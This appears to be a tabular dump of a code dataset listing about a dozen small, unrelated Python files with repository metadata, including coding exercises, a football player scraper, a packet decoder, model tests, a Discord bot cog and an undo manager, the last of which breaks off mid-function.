seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
12089395343 | """
练习:
在终端中获取一个整数,作为边长,打印矩形。
效果:
请输入整数:5
$$$$$
$ $
$ $
$ $
$$$$$
"""
# number = int(input("请输入数字:"))
# print("$" * number)
# for item in range(number-2):#0 1 2
# print("$%s$" % (" " * (number - 2)))
# print("$" * number)
number = int(input("请输入数字:"))
for item in range(number): # 0 1 2 3 4
# 如果头尾
if item == 0 or item == number - 1:
print("$" * number)
else:# 否则
print("$%s$" % (" " * (number - 2)))
| 15149295552/Code | Month02/day04/exercise03.py | exercise03.py | py | 577 | python | zh | code | 1 | github-code | 13 |
70301768337 | from bs4 import BeautifulSoup
import requests
import json
def get_players(team=None, year=None):
# scrape players across all teams and years
if team == None and year == None:
teams = get_team_ids()
print('Checkpoint: Done getting team ids')
players = {}
for team in teams:
team_players = get_players(team=team)
players[team] = team_players
print('Checkpoint: Done getting players from ' + team)
return players
# scrape a team's players across all year
elif team != None and year == None:
players = {}
for year in range(2019, 1949, -1):
player, success = get_players(team, year)
if not success:
break
players[year] = player
print('Checkpoint: Done getting ' + team + ' players from ' + str(year))
return players
# error state
elif team == None and year != None:
return Exception('Cannot specify a year if team is not specified')
# scrape the player for a particular team and year
else:
resp = requests.get('https://www.worldfootball.net/teams/' + team + '/' + str(year) + '/2/')
if resp.status_code != 200:
return [], False
html = BeautifulSoup(resp.content, 'html.parser')
positions = ['Goalkeeper', 'Midfielder', 'Defender', 'Forward']
player_table = None
for table in html.find_all(class_='standard_tabelle'):
if len(table.find_all(string=positions)) > 0:
player_table = table
break
if player_table == None:
return [], True
player = []
for tr in player_table.find_all('tr'):
if len(tr.find_all(string=['Coach', 'Manager'])) > 0:
break
if len(tr.find_all('td')) == 0:
continue
player.append(tr.find_all('td')[2].string)
return player, True
def get_team_ids():
# Top 2 leagues in England, Italy, Germany, and Span
# Top league in France, Netherlands
league_urls = [
'https://www.worldfootball.net/players/eng-premier-league-2018-2019/',
'https://www.worldfootball.net/players/eng-championship-2018-2019/',
'https://www.worldfootball.net/players/bundesliga-2018-2019/',
'https://www.worldfootball.net/players/2-bundesliga-2018-2019/',
'https://www.worldfootball.net/players/fra-ligue-1-2018-2019/',
'https://www.worldfootball.net/players/ita-serie-a-2018-2019/',
'https://www.worldfootball.net/players/ita-serie-b-2018-2019/',
'https://www.worldfootball.net/players/esp-primera-division-2018-2019/',
'https://www.worldfootball.net/players/esp-segunda-division-2018-2019/',
'https://www.worldfootball.net/players/ned-eredivisie-2018-2019/'
]
team_ids = []
for url in league_urls:
resp = requests.get(url)
html = BeautifulSoup(resp.content, 'html.parser')
teams_table = None
for table in html.find_all(class_='standard_tabelle'):
if len(table.find_all(string=['player', 'Matches'])) > 0:
teams_table = table
break
for tr in teams_table.find_all('tr'):
url = tr.find_all('td')[1].a['href']
team_ids.append(url.split('/')[2])
return team_ids
players = get_players()
with open('players.json', 'w') as f:
json.dump(players, f)
| JohnAmadeo/football-networks | scraper_sync.py | scraper_sync.py | py | 3,514 | python | en | code | 0 | github-code | 13 |
21293502029 | # въвеждане на чисто от конзолата
# пресмятане на бонуса според услвията
# добавяне на допълнителен бонус
# принтиране на бонус точките
# принтиране на общия брой точки
number = int(input())
bonus = 0
if number <= 100 :
bonus = 5
elif number > 1000 :
bonus = number * 0.10
else:
bonus = number * 0.20
if number % 2 == 0 :
bonus = bonus + 1
elif number % 10 == 5 :
bonus = bonus + 2
print(bonus)
print(number + bonus) | SJeliazkova/SoftUni | Programming-Basic-Python/Exercises-and-Labs/Conditional_Statements_Exercise/02.Bonus_Score.py | 02.Bonus_Score.py | py | 576 | python | bg | code | 0 | github-code | 13 |
31887144463 | '''
Created on Oct 28, 2018
@author: cmins
'''
# Every coordinates of first value is rows and second value is col
import psexceptions
import psgamestate
class PSBoard:
def __init__(self):
self._board = self.getNewBoard(7, 7)
# Joowon Jan,04,2019
# Add variable to store the value of number of rows and columns
# Set dafault as 7
# Will be used later when we add resizing of board.
self.numOfCols = 7
self.numOfRows = 7
# end
def getNewBoard(self, rows: int, cols: int) -> [[int]]:
''' Creates a new game board with specified rows and columns '''
board = []
boundindex = (rows - 3) / 2
for r in range(rows):
row = []
for c in range(cols):
if r < boundindex or r > (rows - boundindex - 1):
if c < boundindex or c > (cols - boundindex - 1):
row.append(-1)
continue
row.append(1) # fill with 1
board.append(row)
board[int(rows/2)][int(cols/2)] = 0 # center empty
return board
def getBoard(self) -> [[int]]:
''' Returns the board '''
return self._board
def get(self, row: int, col: int) -> int:
''' Returns value of peg at coordinate (-1 0 or 1) '''
if self.isOutOfBounds(row, col):
raise psexceptions.PSOutOfBoundsException()
return self._board[row][col]
def addPeg(self, row: int, col: int) -> None:
self._board[row][col] = 1
def removePeg(self, row: int, col: int) -> None:
self._board[row][col] = 0
def getRows(self) -> int:
''' Returns number of rows of board '''
# return len(self._board)
# Joowon Jan,04,2019
# This should return exact value of length
# I changed it to return variable
return self.numOfRows
# end
def getCols(self) -> int:
''' Returns number of cols of board '''
# return len(self._board[0])
# Joowon Jan,04,2019
# return len(self._board)
# This should return exact value of length
# I changed it to return variable
return self.numOfCols
# end
# Chan Woo, Jan, 23 moved coordinate calculation functions from psgamestate to psboard
def calcPegMiddle(self, fromRow: int, fromCol: int, toRow: int, toCol: int) -> ():
if fromRow - toRow > 0 and fromCol - toCol == 0:
return (fromRow - 1, fromCol)
elif fromRow - toRow < 0 and fromCol - toCol == 0:
return (fromRow + 1, fromCol)
elif fromCol - toCol > 0 and fromRow - toRow == 0:
return (fromRow, fromCol - 1)
elif fromCol - toCol < 0 and fromRow - toRow == 0:
return (fromRow, fromCol + 1)
else:
pass # throwexcemption
def isDiagonal(self, fromcol: int, fromrow: int, tocol: int, torow: int) -> bool:
if (fromcol - tocol) != 0 and (fromrow - torow) != 0:
return False
return True
def isOutOfBounds(self, row: int, col: int) -> bool:
''' Checks if location is in board '''
if row < 0 or row > self.getRows():
return True
if col < 0 or col > self.getCols():
return True
# TODO: check for corners
def printBoard(self) -> None:
''' Display the board on the console '''
for r in range(self.getRows()):
for c in range(self.getCols()):
if self.get(r,c) == -1:
print('x', end=' ')
else:
print(self.get(r, c), end=' ')
print('\n') | ChanwO-o/peg-solitaire | psboard.py | psboard.py | py | 3,800 | python | en | code | 1 | github-code | 13 |
21931887455 | import map,pygame,random
from pygame.locals import *
class CrtPlayer:
#HP,FOOD,SLEEP,SKILL,FOODSPEED,SLEEPSEEPD,PLAYERX,PLAYERY,MAP
def __init__(self,Maps,Scr,Font):
self.HP=100
self.Food=1000
self.Sleep=2000
self.FoodSpeed=2
self.SleepSpeed=2
self.PlayerX=0
self.PlayerY=0
self.PassTimes=0
self.Day=0
self.Map="None"
self.Dir=0 #0Up 1Next 2Now
self.Item=["测试1","测试2"]
self.Scr=Scr
self.Font=Font
#随机选择地图
N=len(Maps)-1
C=random.randint(0,N)
self.Map=Maps[C]
#写入文件
File=open("data/save/player.scpe","w+")
File.writelines(str(self.HP)+"\n")
File.writelines(str(self.Food) + "\n")
File.writelines(str(self.Sleep) + "\n")
File.writelines(str(self.FoodSpeed) + "\n")
File.writelines(str(self.SleepSpeed) + "\n")
File.writelines(str(self.PlayerX) + "\n")
File.writelines(str(self.PlayerY) + "\n")
File.writelines(str(self.Map) + "\n")
File.close()
#写入物品数据
File=open("data/save/playeritem.scpe","w+")
File.close()
self.ManC()
self.ReadPlayer()
print("玩家创建完毕。")
def ManC(self):
R=random.randint(1,4)
if R==1:
self.Man="D级人员"
elif R==2:
self.Man="科研人员"
elif R==3:
self.Man="安保人员"
elif R==4:
self.Man="清洁工"
def ReadPlayer(self):
self.Scr.fill((0,0,0))
#读取角色说明
File=open("data/text/"+self.Man+".txt","r",encoding="UTF-8")
Text=File.readlines()
TextX=300
TextY=200
j=0
for i in Text:
ReadText=self.Font.render(i.strip(),True,(255,255,255))
self.Scr.blit(ReadText,(TextX,TextY+j*30))
j+=1
ReadText=self.Font.render("载入中...",True,(255,255,255))
self.Scr.blit(ReadText, (TextX, TextY + (j+1) * 30))
pygame.display.update()
def GetPlayerXY(self,MapName,Map_Exits,OutFromNowMap,BeforeDoorXY):# 0 NowMap外 1NowMAP内
if OutFromNowMap==0:
if "F-1" in MapName:
if self.Dir==0:
ExitXY=Map_Exits[0]
self.PlayerX=ExitXY[0]
self.PlayerY=ExitXY[1]+1
elif self.Dir==1:
ExitXY = Map_Exits[1]
self.PlayerX = ExitXY[0]
self.PlayerY = ExitXY[1] - 1
elif "F-2" in MapName:
if self.Dir == 0:
ExitXY = Map_Exits[0]
self.PlayerX = ExitXY[0]-1
self.PlayerY = ExitXY[1]
elif self.Dir == 1:
ExitXY = Map_Exits[1]
self.PlayerX = ExitXY[0]
self.PlayerY = ExitXY[1]-1
elif "F-3" in MapName:
if self.Dir == 0:
ExitXY = Map_Exits[0]
self.PlayerX = ExitXY[0]+1
self.PlayerY = ExitXY[1]
elif self.Dir == 1:
ExitXY = Map_Exits[1]
self.PlayerX = ExitXY[0]
self.PlayerY = ExitXY[1]-1
else:
self.PlayerX=1
self.PlayerY=4
else:
if "F-2" in MapName:
self.PlayerX=BeforeDoorXY[0]-1
self.PlayerY=BeforeDoorXY[1]
elif "F-3" in MapName:
self.PlayerX=BeforeDoorXY[0]+1
self.PlayerY=BeforeDoorXY[1]
def PlayerMove(self,Dir,MapName,Map_Exits):
global AimX,AimY
if Dir=="UP":
AimY=self.PlayerY-1
AimX=self.PlayerX
elif Dir=="DOWN":
AimY = self.PlayerY + 1
AimX = self.PlayerX
elif Dir=="R":
AimY = self.PlayerY
AimX = self.PlayerX+1
elif Dir=="L":
AimY=self.PlayerY
AimX=self.PlayerX-1
#检测是否合法
Data=str(MapName).split("^")
File=open("data/mapdata/maps/"+Data[0]+".map","r")
Map=File.readlines()
Ojb=Map[AimY][AimX]
if Ojb=="W":
return 1#禁止通行
elif Ojb=="N":
self.PlayerX=AimX
self.PlayerY=AimY
return 0#可以通行
elif Ojb=="D":
#判断是那出口
A = [AimX, AimY]
if A in Map_Exits[0]:
self.Dir=1
else:
self.Dir=0
return 2
elif Ojb=="M":
return 3
elif Ojb=="O":
return 4
def OpenBackage(self):
pygame.draw.rect(self.Scr,(0,0,0),((300,400),(300,400)))
#显示容量
Much=len(self.Item)
MuchText=self.Font.render(str(Much)+"/5 背包:",True,(255,255,255))
self.Scr.blit(MuchText,(300,400))
i=0
TextX=300
TextY=400
for Text in self.Item:
ItemText=self.Font.render("["+str(i)+"]"+Text,True,(255,255,255))
self.Scr.blit(ItemText,(TextX,TextY+i*32+32))
i+=1
pygame.display.update()
OpenBackage=True
while OpenBackage:
for event in pygame.event.get():
if event.type==KEYDOWN:
if event.key==K_TAB:
return
if event.key==K_0:
self.UseItem(0)
if event.key==K_1:
self.UseItem(1)
if event.key==K_2:
self.UseItem(2)
if event.key == K_3:
self.UseItem(3)
if event.key==K_4:
self.UseItem(4)
def UseItem(self,Which):
pass
def PrintPlayerData(self):
HPText=self.Font.render("HP:"+str(self.HP),True,(255,255,255))
FoodText=self.Font.render("FOOD:"+str(self.Food),True,(255,255,255))
SleepText=self.Font.render("SLEEP:"+str(self.Sleep),True,(255,255,255))
TimeText=self.Font.render("时间:"+str(self.PassTimes),True,(255,255,255))
DayText=self.Font.render("Day:"+str(self.Day),True,(255,255,255))
#处理MAP
Data=str(self.Map).split("#")
Pos=Data[1]
PosText=self.Font.render("位置:"+str(Pos),True,(255,255,255))
#显示
self.Scr.blit(HPText,(700,100))
self.Scr.blit(FoodText, (700, 150))
self.Scr.blit(SleepText, (700, 200))
self.Scr.blit(TimeText, (700, 250))
self.Scr.blit(DayText, (700, 300))
self.Scr.blit(PosText, (700,350))
pygame.display.update()
def PlayerSpend(self):
self.Food-=self.FoodSpeed
self.Sleep-=self.SleepSpeed
self.PassTimes+=1
if self.PassTimes>=500:
self.Day+=1
self.PassTimes=0
#检测是否死亡
def CheckNumber(self):
if self.Food<=0 or self.HP<=0:
self.PlayerDead()
elif self.Day==7:
print("游戏结束。")
def PlayerDead(self):
print("玩家死亡.") | henda233/SCP-E | player.py | player.py | py | 7,486 | python | en | code | 0 | github-code | 13 |
36322830623 | class Move_16:
def __init__(self,other,my,mx):
self.lst1 = other.lst1
self.yx = other.yx
self.my = my
self.mx = mx
def move__1(self):
y,x = self.yx
my = self.my
mx = self.mx
self.lst1[y][x],self.lst1[y+my][x+mx]=self.lst1[y+my][x+mx],self.lst1[y][x]
# self.yx = [y+my,x+mx]
print('\n\n\n')
print(self.lst1)
class Lst:
dic1 = {'u': [-1, 0], 'd': [1, 0], 'r': [0, 1], 'l': [0, -1]}
lst2 = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]]
def __init__(self,lst1,x):
self.lst1 = lst1
self.x = x
for i in range(4):
for j in range(4):
if 16 == lst1[i][j]:
self.yx = [i, j]
mj, mk = 3-self.yx[0],3-self.yx[1]
for movey in range(abs(mj)):
if mj > 0:
self.move_16(1, 0)# 往
else:
self.move_16(-1, 0) # 往下
for movex in range(abs(mk)):
if mk < 0:
self.move_16(0, -1) # 往左
else:
self.move_16(0, 1) # 往右
for i in range(4):
for j in range(4):
if x == lst1[i][j]:
self.jk = [i, j]
for i in range(4):
for j in range(4):
if x == Lst.lst2[i][j]:
self.lm = [i, j]
def move_16(self,my,mx):
y, x = self.yx
self.lst1[y][x], self.lst1[y + my][x + mx] = self.lst1[y + my][x + mx], self.lst1[y][x]
self.yx = [y+my,x+mx]
print(self.lst1)
return self
class Alloction:
def __init__(self,lst1):
self.lst1 = lst1
def allocation(self):
x = self.lst1.x
if x in [1,5,9]:
Move159(self.lst1).do()
elif x in [2,3,6,7]:
Move2367(self.lst1).do()
elif x in [4,8]:
return Move48(self.lst1).do()
elif x == 10:
return Move10(self.lst1).do()
elif x == 11:
return Move10(self.lst1).do()
elif x == 12:
return Move10(self.lst1).do()
else:
return MoveFinl(self.lst1).do()
class Move159():
def __init__(self,other):
self.other = other
def do(self):
if self.other.lm == self.other.jk:
print(self.other.yx,self.other.lm)
print('{0}已还原'.format(self.other.x))
else:
ls = ['u','u','l']
for i in ls:
self.other.move_16(Lst.dic1[i][0],Lst.dic1[i][1])
return 1
class Move2367():
def __init__(self, other):
self.other = other
def do(self):
if self.other.lm == self.other.jk:
print('{0}已还原'.format(self.other.x))
class Move48():
def __init__(self, other):
self.other = other
def do(self):
if self.other.lm == self.other.jk:
print('{0}已还原'.format(self.other.x))
class Move10():
def __init__(self, other):
self.other = other
def do(self):
if self.other.lm == self.other.jk:
print('{0}已还原'.format(self.other.x))
class Move11():
def __init__(self, other):
self.other = other
def do(self):
if self.other.lm == self.other.jk:
print('{0}已还原'.format(self.other.x))
class Move12():
def __init__(self, other):
self.other = other
def do(self):
if self.other.lm == self.other.jk:
print('{0}已还原'.format(self.other.x))
class MoveFinl():
def __init__(self, other):
self.other = other
def do(self):
if self.other.lm == self.other.jk:
print('{0}已还原'.format(self.other.x))
for i in range(1,14):
ll = Lst([[16,1,3,4],[8,7,6,5],[12,11,10,9],[13,15,2,14]],i)
llst = Alloction(ll)
llst.allocation()
break | initialencounter/code | Python/游戏/华容道/15rewrite.py | 15rewrite.py | py | 3,918 | python | en | code | 0 | github-code | 13 |
31299037728 | from abc import ABC, abstractmethod
import numpy as np
input_str = '9C0141080250320F1802104A08'
with open('input', 'r') as f:
input_str = f.read()
input_str = input_str.strip()
print(input_str)
class Packet(ABC):
def __init__(self, type_id, version):
self.type = type_id
self.version = version
self.is_literal = self.type == 4
def get_type(self):
return 'Literal' if self.is_literal else 'Operator'
def decode_header(self, stream):
version = int(stream[:3], 2)
type_id = int(stream[3:6], 2)
return version, type_id, stream[6:]
@abstractmethod
def version_sum(self):
pass
@abstractmethod
def decode(self, stream):
pass
@abstractmethod
def __str__(self):
pass
@abstractmethod
def get_value(self):
pass
class LiteralPacket(Packet):
def __init__(self, type_id, version):
super().__init__(type_id, version)
self.value = None
def decode(self, stream):
out = ''
last_chunk = 1
while last_chunk != 0:
last_chunk = int(stream[0])
out += stream[1:5]
stream = stream[5:]
self.value = int(out, 2)
return self.value, stream
def version_sum(self):
return self.version
def get_value(self):
return self.value
def __str__(self):
out = f'{self.get_type()} (ver {self.version}): [value: {self.value}]'
return out
def __repr__(self):
return self.__str__()
class OperatorPacket(Packet):
def __init__(self, type_id, version):
super().__init__(type_id, version)
self.subpackets = []
def decode_payload(self, stream):
version, type_id, stream = self.decode_header(stream)
if type_id == 4:
packet = LiteralPacket(type_id, version)
_, stream = packet.decode(stream)
self.subpackets.append(packet)
else:
packet = OperatorPacket(type_id, version)
_, stream = packet.decode(stream)
self.subpackets.append(packet)
return stream
def decode(self, stream):
length_type = int(stream[0])
length_type = 11 if length_type == 1 else 15
length = int(stream[1:length_type+1], 2)
stream = stream[length_type+1:]
if length_type == 15:
payload = stream[:length]
while payload:
payload = self.decode_payload(payload)
stream = stream[length:]
else:
for i in range(length):
stream = self.decode_payload(stream)
return self, stream
def version_sum(self):
return self.version + sum([x.version_sum() for x in self.subpackets])
def get_value(self):
if self.type == 0: # sum
return np.sum([x.get_value() for x in self.subpackets])
elif self.type == 1: # product
return np.product([x.get_value() for x in self.subpackets])
elif self.type == 2: # min
return np.min([x.get_value() for x in self.subpackets])
elif self.type == 3: # max
return np.max([x.get_value() for x in self.subpackets])
elif self.type == 5: # less than
assert len(self.subpackets) == 2, 'Too many subpackets for >!'
return int(self.subpackets[0].get_value() >
self.subpackets[1].get_value())
elif self.type == 6: # greater than
assert len(self.subpackets) == 2, 'Too many subpackets for <!'
return int(self.subpackets[0].get_value() <
self.subpackets[1].get_value())
elif self.type == 7: # equals
assert len(self.subpackets) == 2, 'Too many subpackets for ==!'
return int(self.subpackets[0].get_value() ==
self.subpackets[1].get_value())
else:
raise NotImplementedError(f'{self.type} is not a valid operator!')
def __str__(self):
out = (
f'{self.get_type()} (ver {self.version}): ' +
f'[subpackets: {[str(x) for x in self.subpackets]}]')
return out
def __repr__(self) -> str:
return self.__str__()
def decode_header(stream):
version = int(stream[:3], 2)
type_id = int(stream[3:6], 2)
return version, type_id, stream[6:]
def decode_packet(input_str):
stream = ''.join([format(int(x, 16), '04b') for x in input_str])
version, type_id, stream = decode_header(stream)
if type_id == 4:
packet = LiteralPacket(type_id, version)
_, stream = packet.decode(stream)
return packet, stream
else:
packet = OperatorPacket(type_id, version)
_, stream = packet.decode(stream)
return packet, stream
packet, stream = decode_packet(input_str)
# something goes wrong here
# print(packet)
# print(stream)
print(f'Version sum: {packet.version_sum()}')
print(f'Stream value: {packet.get_value()}')
| speug/AdventOfCode2021 | day16/packet_decoder.py | packet_decoder.py | py | 5,003 | python | en | code | 0 | github-code | 13 |
29123887596 | """Test calling `FCNet` with different input and output features."""
import pytest
from torch import rand # pylint: disable=no-name-in-module
from torch_tools import FCNet
def test_model_with_correct_input_features():
"""Test the model works with different input features."""
# With input batchnorm and dropout
model = FCNet(10, 2, hidden_sizes=(5, 5, 5))
_ = model(rand(2, 10))
# Without input batchnorm and dropout
model = FCNet(
20,
2,
hidden_sizes=(5, 5, 5),
input_bnorm=False,
input_dropout=0.0,
)
_ = model(rand(2, 20))
def test_model_with_incorrect_input_features():
"""Test the model breaks when using the wrong number of input features."""
# With input batchnorm and dropout
model = FCNet(10, 2, hidden_sizes=(5, 5, 5))
with pytest.raises(RuntimeError):
_ = model(rand(2, 20))
# Without input batchnorm and dropout
model = FCNet(
10,
2,
hidden_sizes=(5, 5, 5),
input_bnorm=False,
input_dropout=0.0,
)
with pytest.raises(RuntimeError):
_ = model(rand(2, 20))
def test_number_of_output_features_is_correct():
"""Test the model produces the correct number of output features."""
model = FCNet(10, 2, hidden_sizes=(5, 5, 5))
assert model(rand(2, 10)).shape == (2, 2)
model = FCNet(10, 128, hidden_sizes=(5, 5, 5))
assert model(rand(2, 10)).shape == (2, 128)
| jdenholm/TorchTools | tests/models/test_fc_net_call.py | test_fc_net_call.py | py | 1,456 | python | en | code | 4 | github-code | 13 |
12416625769 | # we will write a 'Person' class
class Person(object): # here we explicitly inherit from object
'''This class encapsulates a name, age and email fro a person'''
def __init__(self, n, a, e): # every function in a class MUST take 'self' as an argument
# here we can set inital values on our class
self.name = n # here we actually call setName method
self.age = a
self.email = e
@property # this is the getter
def name(self):
return self.__name
@name.setter
def name(self, new_name): # this is the setter
if type(new_name)==str and new_name != '':
# if new_name.isinstance(str):
self.__name = new_name
else:
self.__name='default'
@property
def age(self):
return self.__age
@age.setter
def age(self, newAge):
if type(newAge)==int and newAge >0:
self.__age = newAge
else:
self.__age = 42
# we can override Python built-ins
def __str__(self):
return (f'{self.__name} is {self.__age} years old') # we return what will be printed
if __name__ == '__main__':
p = Person('Ada', -98, 'ada@babbage.ie')
print(f'Name: {p.name} Age: {p.age}')
# print('Name: {0} Age: {1}'.format(p.name, p.age))
# we CANNOT access the mangled properties of this class
# print(p.__name)
# but be careful
p.__name='oops' # here we add an arbitrary property to the object called p
print(p.__name, p.name)
print(p) # this calles the __str__ method
| onionmccabbage/pythonFeb2023 | using_classes/b.py | b.py | py | 1,589 | python | en | code | 0 | github-code | 13 |
25147857772 | import nextcord
from nextcord.ext import commands
from nextcord import Interaction
import asyncio
from helpers.logger import logger
import openai
import os
class AI(commands.Cog):
def __init__(self, bot) -> None:
openai.api_key = os.getenv("OPENAI_API_KEY")
self.bot = bot
@nextcord.slash_command(name="gpt", description="Ask Bill a question!")
async def gpt(self, interaction: Interaction, prompt: str):
"""Asks OPEN AI, chat gpt a question and try to return the answer."""
try:
logger.debug(f"Question from user id {interaction.user.id}: {prompt}")
await interaction.response.defer()
embed = nextcord.Embed(title=f"Pergunta de {interaction.user.display_name}", description=prompt)
response = openai.Completion.create(
model="text-davinci-003",
prompt=prompt,
temperature=0.9,
max_tokens=300,
frequency_penalty=0.0,
presence_penalty=0.6
)
embed.add_field(name="Resposta:", value=response.choices[0].text)
await asyncio.sleep(0.1)
await interaction.send(embed=embed)
except Exception as ex:
logger.error(f"Error - {ex}")
@nextcord.slash_command(name="image",description="Ask Bill to generate a image for you!")
async def image(self,interaction: Interaction, prompt: str):
"""Asks OPEN AI to generate a image based on a prompt"""
try:
logger.debug(f"Prompt from user id {interaction.user.id}: {prompt}")
await interaction.response.defer()
embed = nextcord.Embed(title=f"{prompt}", description=f"Imagem pedida por {interaction.user.display_name}")
response = openai.Image.create(
prompt=f"{prompt}",
n=1,
size="512x512"
)
image_url = response['data'][0]['url']
embed.set_image(image_url)
await asyncio.sleep(0.1)
await interaction.send(embed=embed)
except openai.error.OpenAIError:
await asyncio.sleep(0.1)
await interaction.send("Desculpe, mas você pediu algo que não é permitido pelo OpenAI! Tente novamente!")
except Exception as ex:
logger.error(f"Error - {ex}")
| TiberiusBR/CaldeiraoBot | cogs/ai.py | ai.py | py | 2,369 | python | en | code | 1 | github-code | 13 |
4997304495 | from django.shortcuts import render
from django.http import HttpResponse
from . import forms
# Create your views here.
def index(request):
context = {}
context['personForm'] = forms.PersonForm()
context['livesForm'] = forms.LivesForm()
context['worksForm'] = forms.WorksForm()
return render(request, "templates/index2.html", context)
# return HttpResponse("Hi there")
def success_view(request):
personForm = forms.PersonForm()
worksForm = forms.WorksForm()
livesForm = forms.LivesForm()
if request.method == "POST":
personForm = forms.PersonForm(request.POST)
if personForm.is_valid():
personForm_name = personForm.cleaned_data["name"]
personForm_street = personForm.cleaned_data["street"]
personForm_city = personForm.cleaned_data["city"]
personForm_company = personForm.cleaned_data["company"]
personForm_salary = personForm.cleaned_data["salary"]
print("inserted ==>", personForm_name, personForm_street, personForm_city,
personForm_company, personForm_salary)
return render(request, "templates/success2.html", context=None)
| teetangh/Kaustav-CSE-LABS-and-Projects | Sem06-Web-Dev-LAB/WEEK 07/week07/question2_app/views.py | views.py | py | 1,220 | python | en | code | 2 | github-code | 13 |
3959021082 | import threading
from app import db
from cloud_components.request_executor import RequestExecutor
class RequestScheduler:
def __init__(self, config_id):
self.deploy_id = config_id
self.__executing__ = False
self.__executing_lock__ = threading.Lock()
self.__current_request_id__ = None
self.request_counter = 0
pass
def start_executing(self):
if not self.__executing__:
self.__executing_lock__.acquire()
self.__executing__ = True
self.__executing_lock__.release()
thread_destroy = threading.Thread(target=self.__start_executing__, args=[], daemon=True)
thread_destroy.start()
def get_queued_requests(self):
return RequestExecutor.query.filter(RequestExecutor.request_end == None) \
.filter(RequestExecutor.deploy_id == self.deploy_id) \
.order_by(RequestExecutor.request_time) \
.all()
def remove_queued_requests(self, request_id):
provided_request = RequestExecutor.query. \
filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.id == request_id).first()
requests_to_delete = RequestExecutor.query. \
filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.request_time > provided_request.request_time).all()
db.session.delete(provided_request)
for request in requests_to_delete:
db.session.delete(request)
db.session.commit()
def get_current_request(self):
if (not self.__current_request_id__):
return None
return RequestExecutor.query \
.filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.id == self.__current_request_id__) \
.first()
def request_now(self, request_executor):
thread = threading.Thread(target=request_executor.execute, args=[], daemon=True)
thread.start()
# All queued requests are executed till none are found
def __start_executing__(self):
current_request : RequestExecutor = RequestExecutor.query \
.filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.request_end == None) \
.order_by(RequestExecutor.request_time) \
.first()
try:
while current_request:
self.__current_request_id__ = current_request.id
current_request.execute()
current_request = RequestExecutor.query \
.filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.request_end == None) \
.order_by(RequestExecutor.request_time) \
.first()
self.__current_request_id__ = None
finally:
self.__current_request_id__ = None
self.__executing_lock__.acquire()
self.__executing__ = False
self.__executing_lock__.release()
| Ydjeen/openstack_testbed | cloud_components/request_scheduler.py | request_scheduler.py | py | 3,064 | python | en | code | 1 | github-code | 13 |
23162245029 | # -*- coding: utf-8 -*-
import copy
# ******* How It Works ************
# For each changes on paper, current paper state is saved.
# To save state, first all top level object list is copied.
# List of all objects on paper (top levels and their children) are generated
# Attribute values of each those objects are stored in separate dictionaries
# in {"attribute_name":value} format.
# While restoring, attribute values of those objects are restored.
# Finally, top level object list on paper is updated.
# redrawing of objects is done whenever necessary.
# each drawable must contain these three attributes
# meta__undo_properties -> attribute that dont need coping, eg - int, string, bool, tuple etc
# meta__undo_copy -> attributes that need copying (e.g - list, set, dict)
# meta__undo_children_to_record -> objects that are not top levels, must be list or set of objects
class UndoManager:
MAX_UNDO_LEVELS = 50
def __init__(self, paper):
self.paper = paper
self._stack = []
self.clean()
self.save_current_state("empty paper")
def clean(self):
self._pos = -1
for record in self._stack:
record.clean()
self._stack.clear()
def save_current_state(self, name=''):
""" push current paper state to the stack """
if len( self._stack)-1 > self._pos:
del self._stack[(self._pos+1):]
if len( self._stack) >= self.MAX_UNDO_LEVELS:
del self._stack[0]
self._pos -= 1
self._stack.append(PaperState(self.paper, name))
self._pos += 1
def undo(self):
"""undoes the last step and returns the number of undo records available"""
self._pos -= 1
if self._pos >= 0:
self._stack[self._pos].restore_state()
else:
self._pos = 0
return self._pos
def redo(self):
"""redoes the last undone step, returns number of redos available"""
self._pos += 1
if self._pos < len( self._stack):
self._stack[ self._pos].restore_state()
else:
self._pos = len( self._stack)-1
return len(self._stack) - self._pos -1
def get_last_record_name(self):
"""returns the last closed record name"""
if self._pos >= 1:
return self._stack[self._pos-1].name
else:
return None
def delete_last_record(self):
"""deletes the last record, useful for concatenation of several records to one;
especially powerful in combination with named records"""
if self._pos > 0:
del self._stack[ self._pos-1]
self._pos -= 1
def can_undo( self):
return bool(self._pos)
def can_redo( self):
return bool( len(self._stack) - self._pos - 1)
def cleanAll( self):
""" do proper clean """
self.clean()
del self.paper
del self._stack
##-------------------- STATE RECORD --------------------
class PaperState:
""" It saves current paper state, and can restore whenever necessary """
def __init__(self, paper, name):
self.paper = paper
self.name = name
self.top_levels = self.paper.objects[:]# list of top level objects on paper
self.objects = self.get_objects_on_paper()# list of objects whose attributes are stored
self.records = []# attribute values of above objects
for o in self.objects:
rec = {}
for a in o.meta__undo_properties:
rec[a] = getattr(o, a)
for a in o.meta__undo_copy:
rec[a] = copy.copy(o.__dict__[a])
self.records.append(rec)
def clean(self):
del self.name
del self.paper
del self.top_levels
del self.objects
del self.records
def get_objects_on_paper(self):
""" recursively list of all objects on paper (toplevel and non-toplevel) """
stack = list(self.paper.objects)
result = []
while len(stack):
obj = stack.pop()
result.append(obj)
for attr in obj.meta__undo_children_to_record:
children = getattr(obj, attr)
[stack.append(child) for child in children]
return result
def restore_state(self):
"""sets the system to the recorded state (update is done only where necessary,
not changed values are not touched)."""
current_objects = set(self.get_objects_on_paper())
to_be_added = set(self.objects) - current_objects # previously deleted objects
to_be_removed = current_objects - set(self.objects) # previously added objects
changed_objs = set()
changed_objs |= to_be_added
# First restore attribute values, and check which objects changed
for i, o in enumerate(self.objects):
changed = 0
for a in o.meta__undo_properties:
if self.records[i][a] != getattr( o, a):
setattr( o, a, self.records[i][a])
changed = 1
for a in o.meta__undo_copy:
if self.records[i][a] != o.__dict__[a]:
o.__dict__[a] = copy.copy( self.records[i][a])
changed = 1
if changed:
# e.g - vertices and atoms in Molecule points to same list object
for a1, a2 in o.meta__same_objects.items():
